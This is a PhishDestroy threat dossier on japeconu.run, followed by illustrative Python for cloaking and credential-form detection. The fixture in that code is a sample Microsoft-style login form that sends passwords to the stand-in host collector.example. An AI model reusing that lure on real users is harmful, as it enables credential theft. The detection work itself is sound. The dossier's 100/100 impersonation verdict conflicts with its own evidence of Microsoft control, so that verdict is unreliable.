# PhishDestroy threat dossier — japeconu.run
================================================================
Fetched: 2026-05-05 13:01:55 UTC
Canonical: https://phishdestroy.io/domain/japeconu.run/

## VERDICT
----------------------------------------------------------------
CRITICAL THREAT — DO NOT VISIT
Composite threat score: 100/100 (PhishDestroy scoring — see methodology below)
Scam classification: Impersonation
Targeted brand: Microsoft

## DETECTION EVIDENCE
----------------------------------------------------------------
VirusTotal: 19/95 security vendors flagged this domain
Flagging vendors: ADMINUSLabs, alphaMountain.ai, AlphaSOC, Antiy-AVL, ArcSight Threat Intelligence, BitDefender, Chong Lua Dao, CRDF, CyRadar, ESET, Forcepoint ThreatSeeker, Fortinet, G-Data, Kaspersky, Lionic, SOCRadar, Sophos, VIPRE, Webroot
Public blocklists: listed on 1 independent blocklist

## INFRASTRUCTURE
----------------------------------------------------------------
IP address: 40.91.108.115 (US, Quincy)
ASN: AS8075 Microsoft Corporation
Hosting org: Microsoft Azure Cloud (westus2)
Registrar: MarkMonitor Inc.
Nameservers: ns001.microsoftinternetsafety.net, ns002.microsoftinternetsafety.net
Registered: 2025-04-10
Expires: 2027-04-10
Page title: This website domain has been seized by Microsoft
HTTP response: 200

## TLS CERTIFICATE
----------------------------------------------------------------
Issuer: Microsoft Corporation / Microsoft Azure RSA TLS Issuing CA 08
Expires: 2026-03-18
Status: INVALID chain
Fingerprint: 03a31abfd38e04030dd4050ccd0e30b3a0b0514bea32c62ff810290ae37e40b4
Subject Alternative Names (related infrastructure — often same operator):
- animatcxju.live
- araucahkbm.live
- boreholeconstruction.org
- castmann.run
- castmaxw.run
- catterjur.run
- changenwg.run
- chipkitk.run
- chivalryr.run
- civitasu.run
- clearui.run
- coilylove.run
- cometusm.run
- coyoteqw.run
- daggerpewl.run
...
+134 more

## ABUSE-REPORT HISTORY (evidence of registrar non-response)
----------------------------------------------------------------
Status: pending notification queue.
No abuse reports filed yet — this domain is waiting for the next cycle of our automated abuse-reporter.

## TIMELINE
----------------------------------------------------------------
Domain registered: 2025-04-10 (per WHOIS / CT — may reflect a renewal or transfer date, not first-ever registration)
First detected: 2026-05-05 13:00:15 UTC (by PhishDestroy tracker)
Last verified: 2026-05-05 16:00:06 UTC
Current status: ACTIVE / observable

## EXTERNAL CORROBORATION (third-party evidence)
----------------------------------------------------------------
URLScan.io: https://urlscan.io/result/019df792-0e12-70ea-8f96-506342a1e632/
Wayback Machine: https://web.archive.org/web/*/japeconu.run
crt.sh CT logs: https://crt.sh/?q=%25.japeconu.run
Google transparency: https://transparencyreport.google.com/safe-browsing/search?url=japeconu.run
AlienVault OTX: https://otx.alienvault.com/indicator/domain/japeconu.run
URLhaus: https://urlhaus.abuse.ch/host/japeconu.run/

## ANALYST NARRATIVE
----------------------------------------------------------------
[Generated: 2026-05-05 13:01:22 UTC — narrative may predate facts above. Treat fields in TIMELINE / DETECTION EVIDENCE / INFRASTRUCTURE as authoritative if they differ from the prose below.]

PhishDestroy classifies japeconu.run as an active Microsoft brand impersonation campaign, on the reasoning that a page presenting itself as a domain-seizure notice could be used to deceive users into surrendering credentials or installing malware. The page title 'This website domain has been seized by Microsoft' reproduces the wording of legitimate Microsoft enforcement communications, a lure that trades on urgency and authority to bypass user scrutiny. Note, however, that the INFRASTRUCTURE and TLS CERTIFICATE fields above (registrar, nameservers, ASN and issuing CA) all name Microsoft-operated services; the classification rests on the page title, not on evidence of third-party control.
No cryptocurrency drainer kit or malicious payload was confirmed in initial sandbox analysis. If the page is a lure, the likely objective would be credential harvesting through a spoofed login portal or credential prompt overlay; no such form, redirect, or payload is recorded on this page, and the fetch returned HTTP 200 with the seizure-notice title shown under INFRASTRUCTURE.

This domain was flagged by 19 of 95 VirusTotal engines, with low blocklist coverage (one list, Maltrail) and no Google Safe Browsing (GSB) listing at the time of analysis, so it remains reachable from most networks.

Registered through MarkMonitor Inc. with a WHOIS date of 2025-04-10 (about thirteen months before first detection, and possibly a renewal or transfer date, as TIMELINE notes), japeconu.run resolves to 40.91.108.115 in AS8075, Microsoft's own network (Azure westus2), and is served by nameservers under microsoftinternetsafety.net. The TLS certificate was issued by Microsoft Azure RSA TLS Issuing CA 08, a Microsoft-operated CA, and carries 149 further domains in its SAN field. The record above shows an INVALID chain and an expiry of 2026-03-18, before the fetch date, so a browser would display a certificate warning rather than any trust indicator. Neither the registration age nor the certificate supports the picture of a freshly deployed throwaway lure; a certificate from the brand's own CA on the brand's own network is evidence of brand control, not of impersonation.

As of this investigation japeconu.run is live and serving the seizure notice. PhishDestroy advises immediate blocking at DNS and network levels. Before acting on that, confirm who controls the domain, for example through the URLScan result and crt.sh history linked under EXTERNAL CORROBORATION: every infrastructure field on this page is consistent with a Microsoft-operated seizure page, and blocking a brand-operated sinkhole adds no protection. Users who receive a 'domain seized' notice by email or pop-up should not follow embedded links and should verify the notice through Microsoft's official channels (domains@microsoft.com or portal.azure.com).

The residual risk is the lure pattern itself: 'domain seized' wording borrows the authority of a real enforcement communication, and a genuine impersonation campaign built on it would propagate quickly through phishing email. If impersonation is confirmed, the Microsoft Security Response Center can be notified at secure@microsoft.com with full IOCs to support takedown efforts.
## EVIDENCE HASHES
----------------------------------------------------------------
TLS cert SHA-256: 03a31abfd38e04030dd4050ccd0e30b3a0b0514bea32c62ff810290ae37e40b4

## SCORING METHODOLOGY
----------------------------------------------------------------
Composite score is NOT derived from VirusTotal alone. PhishDestroy aggregates:
- VirusTotal positive ratio
- Public blocklist consensus (MetaMask, ScamSniffer, OpenPhish, PhishTank, URLhaus, CryptoFirewall, SEAL, Polkadot, Enkrypt, Phishunt, DiscordPhishing, PhishingDB)
- Cloaking detection (HTTP 666 or rendering delta between bot and real visitor)
- DNS-filter consensus (Quad9, CleanBrowsing, NextDNS, AdGuard, Cloudflare, etc.)
- AlienVault OTX pulses + Cloudflare Radar + Google Safe Browsing
- URLScan / URLQuery verdicts
- Brand-impersonation heuristics (DOM analysis of forms, logos, wording)
- Known phishing-kit fingerprinting (favicon hash, JS obfuscation signatures)
- Wallet-drainer family classification (Angel, MS, Rainbow, Pink, Inferno, ...)
- Free-TLS vs paid-cert ratio (throwaway infrastructure signal)
- Registrar/hosting abuse history (this registrar's track record)
- Human researcher sign-off (volunteer takedown team)

A domain present in our database is ALREADY flagged. A low VT count by itself does NOT mean the domain is safe — new scam domains routinely show 0/95 VT for their first 7–30 days while actively draining wallets. Always cross-reference the composite score and the individual indicators above, not just VT.

## CORRECTIONS / APPEALS
----------------------------------------------------------------
Full HTML report: https://phishdestroy.io/domain/japeconu.run/
JSON API: https://api.destroy.tools/v1/check?domain=japeconu.run
Appeal a flag: https://phishdestroy.io/appeals/ (responded to within 48 hours, FP rate <0.01%)
Submit a report: https://t.me/PhishDestroy_bot
About PhishDestroy: volunteer-driven open-source threat-intelligence platform.
Tracked: 146,008 domains (61,917 alive under monitoring, 83,630 confirmed takedowns/dead). Site: https://phishdestroy.io
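Two of the heuristics in the SCORING METHODOLOGY list, cloaking detection (bot versus real-visitor rendering delta, plus the non-standard HTTP 666 status the list mentions) and the forms part of brand-impersonation DOM analysis, as an added worked example. This is illustrative code written for this dossier, not PhishDestroy's scanner: the user-agent strings, the 0.6 similarity threshold, the BRAND_WORDS vocabulary, the hypothetical host lure.example and the constructed sample pages are all assumptions.

```python
# Added illustration of two SCORING METHODOLOGY heuristics; not PhishDestroy's
# scanner. UA strings, the 0.6 threshold, BRAND_WORDS and the sample pages are assumed.
import re
from difflib import SequenceMatcher
from html.parser import HTMLParser
from urllib.parse import urlsplit

BOT_UA = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
BROWSER_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
              "(KHTML, like Gecko) Chrome/124.0 Safari/537.36")
BRAND_WORDS = ("microsoft", "office 365", "outlook", "onedrive")  # assumed vocabulary


class _PageFeatures(HTMLParser):
    """Collect visible text, password inputs and form actions from an HTML body."""

    def __init__(self):
        super().__init__()
        self.text, self.form_actions, self.password_inputs = [], [], 0
        self._skip_depth = 0  # >0 while inside <script>/<style>

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag in ("script", "style"):
            self._skip_depth += 1
        elif tag == "input" and a.get("type", "").lower() == "password":
            self.password_inputs += 1
        elif tag == "form":
            self.form_actions.append(a.get("action", ""))

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._skip_depth:
            self._skip_depth -= 1

    def handle_data(self, data):
        if not self._skip_depth:
            self.text.append(data)


def extract_features(html):
    """Normalised visible text plus the DOM indicators the heuristics look at."""
    p = _PageFeatures()
    p.feed(html)
    text = re.sub(r"\s+", " ", " ".join(p.text)).strip().lower()
    return {"text": text, "password_inputs": p.password_inputs,
            "form_actions": p.form_actions,
            "brand_words": [w for w in BRAND_WORDS if w in text]}


def assess(fetch, url, delta_threshold=0.6):
    """fetch(url, user_agent) -> (status, html). Fetch as crawler and as browser,
    then report cloaking signals and credential-form signals from the browser view."""
    bot_status, bot_html = fetch(url, BOT_UA)
    usr_status, usr_html = fetch(url, BROWSER_UA)
    bot, usr = extract_features(bot_html), extract_features(usr_html)
    similarity = SequenceMatcher(None, bot["text"], usr["text"]).ratio()
    host = urlsplit(url).hostname

    cloak = []
    if 666 in (bot_status, usr_status):  # non-standard status the dossier lists
        cloak.append("http_666")
    if bot_status != usr_status:
        cloak.append(f"status_delta:{bot_status}->{usr_status}")
    if similarity < delta_threshold:  # crawler and visitor see different pages
        cloak.append(f"render_delta:{similarity:.2f}")
    if usr["password_inputs"] and not bot["password_inputs"]:
        cloak.append("credential_form_hidden_from_crawler")

    brand = []
    if usr["password_inputs"]:
        brand.append("password_form")
        if usr["brand_words"]:
            brand.append("brand_wording:" + ",".join(usr["brand_words"]))
        for action in usr["form_actions"]:
            target = urlsplit(action).hostname
            if target and target != host:  # credentials posted to another host
                brand.append(f"form_posts_offsite:{target}")

    return {"cloaked": bool(cloak), "credential_form": bool(usr["password_inputs"]),
            "similarity": round(similarity, 2),
            "cloak_signals": cloak, "brand_signals": brand}


# Constructed sample responses for a hypothetical lure host; nothing here was
# captured from japeconu.run or any real site.
_SAMPLES = {
    BOT_UA: (200, "<html><head><title>Welcome</title></head><body>"
                  "<p>This site is under construction. Please check back later "
                  "for updates on our products and services.</p></body></html>"),
    BROWSER_UA: (200, "<html><body><h1>Sign in to your Microsoft account</h1>"
                      "<form action='https://collector.example/post' method='post'>"
                      "<input name='loginfmt'><input type='password' name='passwd'>"
                      "<button>Next</button></form></body></html>"),
}


def sample_fetch(url, user_agent):
    """Stand-in for an HTTP client: returns the constructed page for each UA."""
    return _SAMPLES[user_agent]
```

`assess(sample_fetch, "https://lure.example/")` reports the page as cloaked (the crawler sees a placeholder, the browser sees a Microsoft-worded password form that posts to collector.example). The fetch callable is injected so the same logic can be pointed at a real HTTP client that sets the User-Agent header; for a page like the one in this dossier, which returns the same seizure notice to every client and carries no form, both signal lists come back empty.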